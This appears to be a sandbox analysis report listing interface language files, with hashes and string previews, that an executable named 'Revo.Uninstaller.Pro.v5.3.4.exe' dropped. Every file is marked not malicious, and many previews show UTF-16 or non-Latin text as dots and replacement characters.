                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.D.e.u.t.s.c.h./.G.e.r.m.a.n.....W.e.b.L.a.n.g.=.G.E.R.....T.r.a.n.s.l.a.t.o.r.=.D.i.r.k. .P.a.u.l.s.e.n. ." .A.n.d.y. .K.l.e.i.n.e.r.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.n.s.i.c.h.t.....1.0.3. .=. .E.i.n.s.t.e.l.l.u.n.g.e.n. .(.A.l.t. ..' .O.).....1.0.4. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.0.5. .=. .E.x.t.r.a.s.....1.0.6. .=. .J.a.g.d.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.n.a.n.s.i.c.h.t.....1.0.8. .=. .S.y.m.b.o.l.a.n.s.i.c.h.t.....1.0.9. .=. .D.e.t.a.i.l.a.n.s.i.c.h.t.....1.1.0. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.1.1. .=. .E.l.e.m.e.n.t. .l...s.c.h.e.n.....1.1.2. .=. .A.k.t.u.a.l.i.s.i.e.r.e.n. .(.S.t.r.g. ..' .R.).....1.1.3. .=. .M...c.h.t.e.n. .S.i.e. .d.a.s. .a.u.s.g.e.w...h.l.t.e. .E.l.e.m.e.n.t.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (763), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):131466
                                                                                                                                                                          Entropy (8bit):4.065690087759101
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:rUVdwiSTdrABIXzfGCR3ZIaqF9/Yfzbu/TysGGaqZQ/NOjYF1aCiLGH:rUVdwiSTdrABIXzfGCR3ZIaqn/YfzbuC
                                                                                                                                                                          MD5:9A0D1063F791A4803AFB207E145FB7F5
                                                                                                                                                                          SHA1:4684E675834CB94ABD0A5AA4C7DEFABCF5B8CB9A
                                                                                                                                                                          SHA-256:0561BBFFC5347477DE4F28FB6C76F0DFEE254656125201DE0268392FBCE24368
                                                                                                                                                                          SHA-512:D662103D2716357942AD16C1386CA44D9E3BFEB289A6A4E2B8B586E851C29395A623BDE0AC35F090D04B7FE12632D68D427E2D6038CFE4D78DC321A09476E31E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .............../.G.u.j.a.r.a.t.i.....W.e.b.L.a.n.g.=.G.U.J.....T.r.a.n.s.l.a.t.o.r.=.K.u.m.a.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...........1.0.3. .=. ...................1.0.4. .=. ...........................1.0.5. .=. ...............1.0.6. .=. ............. ...........1.0.7. .=. .............1.0.8. .=. ...................1.0.9. .=. ...............1.1.0. .=. ..................... ...........1.1.1. .=. ............... ....... ...........1.1.2. .=. ............... ...........1.1.3. .=. ....... ....... ........... ......... ........... ................... ....... ......... ........... .....?.....1.1.4. .=. ....... ....... ........... ......... ........... ....................... ..................... .........
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):93828
                                                                                                                                                                          Entropy (8bit):4.066173134482651
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:H3oaEv+m7B5TZ5PNQzeoh2TwMRwBCDwUnMM8yArA4ad:Xoacmzhh2TwMRwADwUnn80d
                                                                                                                                                                          MD5:06007D50FFCC9ADCEFF96CF4439D033A
                                                                                                                                                                          SHA1:9C36E3C895694F30D1632B1EC0D571F5D8A2F2F9
                                                                                                                                                                          SHA-256:4C301B86818CA1D9134A8E416D347FF50EFF071E8377F69EB838FB42FF0ABAB3
                                                                                                                                                                          SHA-512:68B40EA6FE2FF9527D62E03B9A88583B2E4AE38F8FDC4016071CB47ED7CE2DB87411BD114566E840B946600123CC251C12C0C023528DBBAEFE4DFF26443860A6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.........../.H.e.b.r.e.w.....W.e.b.L.a.n.g.=.H.E.B.....T.r.a.n.s.l.a.t.o.r.=.Y.a.r.o.n...S. .-. .Y.a.r.o.n.'.S. .T.e.a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...2...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .....................1.0.4. .=. ......... ...................1.0.5. .=. .............1.0.6. .=. ."....... .".............1.0.7. .=. ...............1.0.8. .=. .....................1.0.9. .=. ...............1.1.0. .=. ...........1.1.1. .=. ....... ...........1.1.2. .=. .............1.1.3. .=.?. ....... ...../... ........./... ............... ........... ..... ......... ...............1.1.4. .=.?. ....... ...../... ........./... ............... ........... ..... ............. .................1.1.5. .=........... ...................1.
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (789), with CRLF line terminators
Category: dropped
Size (bytes): 137504
Entropy (8bit): 4.127665630312148
Encrypted: false
SSDEEP: 3072:nH5z/5zzxtz9IraMTSvkNgcM1o2VTHbv5frC:H5XcmC
MD5: 323B3488D5BF1B952B83DC562E0A3FA2
SHA1: 8DB1AE77803019DB4503B878537C77DCA46391A4
SHA-256: B798D3535F10CCCA8507D9FA0BB891470A8D8D5364013EAAF05D0224BC2247E8
SHA-512: A66EDA53342213C7D475A0569B52CA8DF8C67949C75D6EA1CAA63420D5A1DBE4BBD2818F782257356DA474E2DF558AF8DE37BA9B2614EA831910855631ABB3CE
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=��������/Greek(Hellenic)
  WebLang=GR
  Translator=VS Revo Group
  Codepage=UNICODE
  Version=4.1.0

  [Uninstaller Toolbar]
  102 … 113 = [Greek-script strings; not recoverable from the report's preview rendering]
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (754), with CRLF line terminators
Category: dropped
Size (bytes): 130882
Entropy (8bit): 4.087011727696048
Encrypted: false
SSDEEP: 3072:UY/rr+qMUWBBZ/a/kHLM6/CgK8czSTMy/7:F/P+DUWx/06czSd/7
MD5: 271D39E6FF688E684A970F677FFA00B9
SHA1: 5A2415E31E5A7E4A5781603FF844406D48AE646A
SHA-256: 0B1BF07D976B9E20E2C97EE9D0C959842F885619F0282A5CAEBB882DF0075D47
SHA-512: 237D8C27172694F43678C79F211F11769C770E6FDE1FF9F239692B9F93FD78AF53F8D65109CCFBB111C32DA598DA67B94C78962D1A2C0A647F20B45459DAA46A
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=������/Hindi
  WebLang=HIN
  Translator=J.Kishore Reddy, ashish sharma
  Codepage=UNICODE
  Version=5.3.4

  [Uninstaller Toolbar]
  102 … 114 = [Devanagari-script strings; not recoverable from the report's preview rendering]
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (600), with CRLF line terminators
Category: dropped
Size (bytes): 93810
Entropy (8bit): 3.5478965253929156
Encrypted: false
SSDEEP: 768:loeLuV/aGAVazqJfWUEOINf9Fp2EitEEdQnv6cEeSvi2dIn1VponVP3rMDv:wVcXJfWUCFFpcxEv9Wvi2WDpua
MD5: 7D31DBE80F1759C28FFA258946FEC92F
SHA1: A010F11A8C3A495F126F4C9FDB7317ABB1986A17
SHA-256: 9F69A409CADA6A835370E3A457EE83470F895B60755EE0807F27276C5738FD35
SHA-512: 542D1D5CBAA93BF9368B653D9D56E69860EAA698C33293223BFBFD474EECA7E1482D7E795DFBFB407D670913F87DB3E0A87351970CC0A0DB76DAB43CAC1199B9
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=Hrvatski/Croatian
  WebLang=HR
  Translator=Hasan Osmanagi�
  Codepage=UNICODE
  Version=3.1.8

  [Uninstaller Toolbar]
  102 = Izgled
  103 = Postavke
  104 = Deinstaler
  105 = Alati
  106 = Presretanje
  107 = Popis
  108 = Ikone
  109 = Detalji
  110 = Deinstaliraj
  111 = Ukloni unos
  112 = Osvje�i
  113 = Ukloniti ozna�eni unos?
  114 = Deinstalirati ozna�eni program?
  115 = Dogradnja
  116 = Pomo�
  117 = Upute
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
Category: dropped
Size (bytes): 134684
Entropy (8bit): 3.6263066482370334
Encrypted: false
SSDEEP: 3072:WuphjkIdd/DdEIK0maAmDwQPVC0fwodhjAMX+907+AjwVm+MV8iW8HjJkSADPUFj:huPUTmK
MD5: 9D502EA4D293E8CDD722B1CC120ACE31
SHA1: 004732BAADE360FB190885B26C8D0F477B89935D
SHA-256: D362840E3245B77979D529C10C755E21AF193F0406BD850D813673E17D888A26
SHA-512: 29261C915860319189B31C72C581B33C1F4967C2D77B924A8FCD530930E8B2C418030FC55993A188E5EC956D75D3F91BE89F4E25C31FC4A9DA005FC6B6F134D7
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=Magyar/Hungarian
  WebLang=HUN
  Translator=D�br�ntei S�ndor - sandor.dobrontei@gmail.com
  Codepage=UNICODE
  Version=5.3.4

  [Uninstaller Toolbar]
  102 = N�zet
  103 = Be�ll�t�sok
  104 = Elt�vol�t�
  105 = Eszk�z�k
  106 = Keres� m�d
  107 = Lista
  108 = Ikonok
  109 = R�szletek
  110 = Elt�vol�t�s
  111 = Bejegyz�s t�rl�se
  112 = Friss�t�s
  113 = Biztos benne, hogy t�rli a kijel�lt bejegyz�st?
  114 = Biztos ben
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (717), with CRLF line terminators
Category: dropped
Size (bytes): 127392
Entropy (8bit): 3.4614005609864864
Encrypted: false
SSDEEP: 768:locWzmYvaewluEO21T4oOdCWKWdOvHLu1ab9YVU/yfIyN07kr5VRQ2BNi4ZVRENz:Yulu0hCdOvHqb95cB3k5k
MD5: 59F2A36A20215347BEB58ACB7CEABA53
SHA1: 40C01D8893E698F802095D8ED5CD6CC05A4B7A0B
SHA-256: 30388CC2C429EFB94253B926C64BE4D167C2F362DB09300AC4554520DF419C56
SHA-512: DF87473B891803D14592C53E2EC5878DCD0391B51991D712BAE4F9E0B5F5C2819B510009448F8B516AE926BDF551B43DFD8F524B549D6476E5608F6C919E83A2
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=Bahasa Indonesia/Indonesian
  WebLang=IND
  Translator=Purwo Adi Nugroho
  Codepage=UNICODE
  Version=5.3.4

  [Uninstaller Toolbar]
  102 = Lihat
  103 = Pilihan
  104 = Penghapus
  105 = Peralatan
  106 = Mode Pemburu
  107 = Daftar
  108 = Ikon
  109 = Rincian
  110 = Hapus
  111 = Hapus Catatan
  112 = Segarkan
  113 = Apakah anda yakin ingin menghapus catatan terpilih?
  114 = Apakah anda yakin ingin menghapus progr
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (662), with CRLF line terminators
Category: dropped
Size (bytes): 142466
Entropy (8bit): 3.396814543249537
Encrypted: false
SSDEEP: 1536:eNJzHR1iVUz5T/mHE+fs1eEDVUcdPNjVlKEhL98UAueg8fC:kJzHTX5TeHE+f+eEDVNdPhVlKwZ8dgaC
MD5: 71BAA3C894A26E3C285262E34960F6C8
SHA1: 33509E1740D10D7FD813F353BDE5BC1DB4A699B0
SHA-256: 9B287843DA49B5975FEA024EA51BD68AA8B03A9946F3CF043201D524033F77DF
SHA-512: A7E40761892BC379CE907BA55E3AA4E9AE0DA50454DB8D2BBC89467E5F66A031B740B654362AEA2189F8DEC5AD759456890B991719886D75D74DFAB508929F1B
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=Italiano/Italian
  WebLang=ITA
  Translator=Maria Grazia Barbieri,Massimo Castiglia
  Codepage=UNICODE
  Version=5.3.4

  [Uninstaller Toolbar]
  102 = Visualizzazione
  103 = Opzioni
  104 = Disinstallatore
  105 = Strumenti
  106 = Modo mirino
  107 = Lista
  108 = Icone
  109 = Dettagli
  110 = Disinstalla
  111 = Rimuovi voce
  112 = Aggiorna
  113 = Sicuro di voler rimuovere la voce selezionata?
  114 = Sicuro di vo
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category: dropped
Size (bytes): 77404
Entropy (8bit): 5.228699203430081
Encrypted: false
SSDEEP: 1536:84p2dHm7WVI3NNRdZKxCJNFYsWXrQ2YjnW9Xq3iQSa0qqMyeqXLRZEvAcrNcV5Gx:j2dHgWWfRdZbNF/WXrQ2YLW963iQSa0+
MD5: 040C2D8EBC17DACAF936A472088110A4
SHA1: A8CA607E209452B7886F6E9CBEAA7253623496FE
SHA-256: 2F2DC8C8727EC6C1E4898E150A8CD962F394C37ECEF6838CE0807CE8363A9358
SHA-512: 3AD8367F4F2A52BD6B975AFDED53BDEC5A25439DADB81DFC78A67626F7250C284A6BA5AF73F489FD94734CC178D9F3217D34F4C73A9A6109636CA09BC100DB59
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=���/Japanese
  WebLang=JPN
  Translator=Tilt
  Codepage=UNICODE
  Version=5.3.4

  [Uninstaller Toolbar]
  102 … 121 = [Japanese-script strings; not recoverable from the report's preview rendering]
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
Category: dropped
Size (bytes): 77282
Entropy (8bit): 5.344405966542523
Encrypted: false
SSDEEP: 768:lohuLfu+X83GXjDzy48AISFuPm553g6R6JCezMzd4ytJ7r2BtEaClqc:ACfu+X83GXjPyx9Sn53g6R6JO7EMlqc
MD5: 9B08D7938D6B83218D43FA1F884D821A
SHA1: D8B4B40502954521DDA2955C2CC0919B80CB8188
SHA-256: 88B117C0F2A37A375F86EF3C686288C954A88F4647230DE58C47D7532FFC7115
SHA-512: 4E471F55D3D65D196202415071797E855AA2A93B26D25128686D5A68BF04A9D0307D4C3B22179A3B55384918819524B1ECD46CAD9DE0C9C406529A82F41764CE
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=��� / Korean
  WebLang=KOR
  Translator=JaeHyung Lee / kolanp@gmail.com
  Codepage=UNICODE
  Version=5.3.4

  [Uninstaller Toolbar]
  102 … 120 = [Hangul-script strings; not recoverable from the report's preview rendering]
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (531), with CRLF line terminators
Category: dropped
Size (bytes): 69202
Entropy (8bit): 3.580198978681514
Encrypted: false
SSDEEP: 768:lojEDwthZmIwWc3bBtbD0ANX8If2WDafbdoV4XL26VZiIJBPbdBnXPaei7:s+hX18bBRD2
MD5: 2CE2A032457DDD8E1DC8868CC1C75A48
SHA1: 9229850C65FA487A26C9FE4DDA51C302533C195B
SHA-256: 0AF0D6E4657ED06CCD5AE0FB5E8E3BFBE0CE3950757F1AC109C1104DB051F98F
SHA-512: 3D1EBA1104A15189EDC30033D7EA011E9F2EB623941464238506F487D58CBA87A05B3CC2E8860FF5CCAB0CD637796AF49A132CBF21C7B3E2F2F6004BE6B0935C
Malicious: false
Preview:
  ;Language file of Revo Uninstaller Pro
  ;This section must use English
  [Info]
  Language=Kurd�/Kurdish
  WebLang=KUR
  Translator=Occo Mahabad - occo74@hotmail.com
  Codepage=UNICODE
  Version=2.5.3

  [Uninstaller Toolbar]
  102 = D�men
  103 = Eyar
  104 = Uninstaller/Raker
  105 = Am�r
  106 = Moda N���rvan
  107 = L�ste
  108 = S�mge
  109 = Detay
  110 = Rake
  111 = Qeyd� Rake
  112 = N� Bike
  113 = Qeyda hilbijart� were rakirin?
  114 = Bernameya hilbijart� were rakirin?
  115 = Rojane Bike
  116 = Al�
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (484), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):110288
                                                                                                                                                                          Entropy (8bit):3.9383295798946234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:4seY/kLsTdMxIxQazH+KM5N59cSvvbbuig36p7Ne8hVudV1vNWM3ktFRDlxD8ygB:jeY/6xIxQazH+KM5N59cSvvbbuig3SuD
                                                                                                                                                                          MD5:B78738D6771FCA62516F8EB15C9460DB
                                                                                                                                                                          SHA1:69D6F4193A9CD53776162E491BA0C78CDAE77966
                                                                                                                                                                          SHA-256:A93CFABCDCC7D9876EBD2BD3775E77EE4B194870A981588F747BC01F7EC86FB5
                                                                                                                                                                          SHA-512:5CCE82FCA675751A9E22C0F15C938C237B15E63422DE436A6E448D34F8FB8819E9F41E4F01B5117983F615B38029363FC7B1DBC58B7B9268BC1B54294A803652
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=...0.:.5.4.>.=.A.:.8./.M.a.c.e.d.o.n.i.a.n.....W.e.b.L.a.n.g.=.M.K.D.....T.r.a.n.s.l.a.t.o.r.=.0.1. .V.l.a.t.c.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r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
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (435), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):116584
                                                                                                                                                                          Entropy (8bit):3.4724567340731216
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:FW7jQkbLU+miBrdji6E+X4teDexIa073UCYIRWq13rSsVLYU4:Mbi
                                                                                                                                                                          MD5:D5A24F2D5AE12A843240E354EB26BCD6
                                                                                                                                                                          SHA1:A2BD707D7195CD1A3163D4F33750457F5D889DE9
                                                                                                                                                                          SHA-256:FF3F554C0F9249C1F76E7E9B2F4CA8EDE2CA42459BE3BE37A483DEC10D64F73E
                                                                                                                                                                          SHA-512:533F1FF1D5414A1941C408BB29B855B2D1851CE05C5EFEA24B9D4AFA7232933CC08BB67DFCCBA4F4B3C0798F934AC4452730A1164C17ECAE0C6C8BE69D0ABCF4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.o.r.s.k./.N.o.r.w.e.g.i.a.n.....W.e.b.L.a.n.g.=.N.O.R.....T.r.a.n.s.l.a.t.o.r.=.P.a.a.l. .R.o.n.n.i.n.g.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .A.l.t.e.r.n.a.t.i.v.....1.0.4. .=. .A.v.i.n.s.t.a.l.l.e.r.e.r.....1.0.5. .=. .V.e.r.k.t...y.....1.0.6. .=. .J.a.k.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.v.i.n.s.t.a.l.l.e.r.e.....1.1.1. .=. .T.a. .b.o.r.t. .p.o.s.t.....1.1.2. .=. .O.p.p.d.a.t.e.r.e. .p.r.o.g.r.a.m.l.i.s.t.e.n.....1.1.3. .=. .V.i.l. .d.u. .v.i.r.k.e.l.i.g. .t.a. .b.o.r.t. .V.a.l.g.t. .p.o.s.t.?.....1.1.4. .=. .V.i.l. .d.u. .v.i.r.k.e.l.i.g. .t.a. .b.o.r.t. .V.a.l.g.t. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.p.d.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (1970), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):121434
                                                                                                                                                                          Entropy (8bit):3.814439127324583
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loaWsQeVjoYi8L0q1NzZ08iZnDt9+b311fUiXMkISCNXLz3UhUp:cr4oYi8L0q1c8MDv+bl1fhyBz3so
                                                                                                                                                                          MD5:3C10E3A4E879163DC1AC916D3AAE316C
                                                                                                                                                                          SHA1:3F5D75D837EF2490AB6C5B035855766443DF5A4B
                                                                                                                                                                          SHA-256:7173C74A1CD8F6AE7AEABF34A4AFA18DA73D1E595850C06953BF70CA8326F3D0
                                                                                                                                                                          SHA-512:14538BDFE3DFE2EE7DA9FF84E7E13B591732F0161622C203DB487009A6CB23E2760BEC5459B5FAD620184F2CC19F09D5865DF8F03C51BFD44A18C4CEE73AE03C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.A.'.1.3.J./.P.e.r.s.i.a.n.....W.e.b.L.a.n.g.=.F.A.R.....T.r.a.n.s.l.a.t.o.r.=.E.G.F./.3. .9.(./.'.D.1.6.'. .4.A.'..... .|. .E.d.i.t.e.d. .B.y. .A.l.i.r.e.z.a. .K.a.l.a.l.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....V.e.r.s.i.o.n.=.4...0...5.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2.=.F.E.'.J.4.....1.0.3.=.*.F.8.J.E.'.*.....1.0.4.=.-.0.A. ...F.F./.G.....1.0.5.=.'.(.2.'.1.G.'.....1.0.6.=.-.'.D.*.\.n. .4...'.1...J.....1.0.7.=.A.G.1.3.*.....1.0.8.=.4.E.'.J.D.....1.0.9.=.,.2.&.J.'.*.....1.1.0.=.-.0.A. .(.1.F.'.E.G.....1.1.1.=.-.0.A. .H.1.H./.J. .....1.1.2.=.*.'.2.G. .3.'.2.J.....1.1.3.=.".J.'. .E.7.E.&.F. .(.G. .-.0.A. .H.1.H./.J. .'.F.*...'.(. .4./.G. .G.3.*.J./. .......1.1.4.=.".J.'. .E.7.E.&.F. .(.G. ...1.H.,. .(.1.F.'.E.G. .(.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (512), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):125354
                                                                                                                                                                          Entropy (8bit):3.6916938529521914
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loKRrsLkYOChte3GW00OKansDxs1ugPaqP9L97jcpvqRtNCOuvMYrcmPulvhvFNO:GRJnsDyYgP5P9LWEZBPCzAObr
                                                                                                                                                                          MD5:00E4EA38C09BE2C82D4062345B74C975
                                                                                                                                                                          SHA1:1644834E917EF74EF374C63D740076C61B18F07F
                                                                                                                                                                          SHA-256:20F8BDF0C06B31434AD9A6D515477A86D84E758490E47DB1724E358A48A650F3
                                                                                                                                                                          SHA-512:7CFC2B303F1B8CB25B63B726491A0062F2184D7E2A60911EB3235E3E8F50167610C043F2C3E0DF32C6DE76C454D2D74597F286988D87BE3D81259AAC3426CE18
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.l.s.k.i./.P.o.l.i.s.h.....W.e.b.L.a.n.g.=.P.L.....T.r.a.n.s.l.a.t.o.r.=.h.i.r.y.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .W.i.d.o.k.....1.0.3. .=. .O.p.c.j.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .N.a.r.z...d.z.i.a.....1.0.6. .=. .T.r.y.b. .B.o.w.c.y.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .S.z.c.z.e.g...B.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.u.j.....1.1.1. .=. .U.s.u.D. .w.p.i.s.....1.1.2. .=. .O.d.[.w.i.e.|.....1.1.3. .=. .C.z.y. .n.a. .p.e.w.n.o. .u.s.u.n..... .z.a.z.n.a.c.z.o.n.y. .o.b.i.e.k.t.?.....1.1.4. .=. .C.z.y. .n.a. .p.e.w.n.o. .o.d.i.n.s.t.a.l.o.w.a... .z.a.z.n.a.c.z.o.n.y. .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.k.t.u.a.l.i.z.u.j.....1.1.6. .=. .P.o.m.o.c.....
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):140588
                                                                                                                                                                          Entropy (8bit):3.4494661461016882
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:L3UBZgoBUk7SJAW+UMwHdaIaSnutDxbheao+fBpdaA1a16Q1D5DerB2Tm:YghYgnutD7/
                                                                                                                                                                          MD5:500FBED3543879F343C8081B2FDF1FF5
                                                                                                                                                                          SHA1:AC859C7013C87DD824C73ED77970BD973762EEE0
                                                                                                                                                                          SHA-256:9436996BABA11BC3CFD246CEB4C3F70185806A5612027990D6999F469E09AC5E
                                                                                                                                                                          SHA-512:D1337F8723E5C3FAD06AFF44E2DE82D7DC9A42614C7F88C465BE28665EEF2374DE75C788D335112CAF54F24562354D2B03175EBC7E567FEE60522E6EA1A1BCFE
                                                                                                                                                                          Malicious:false
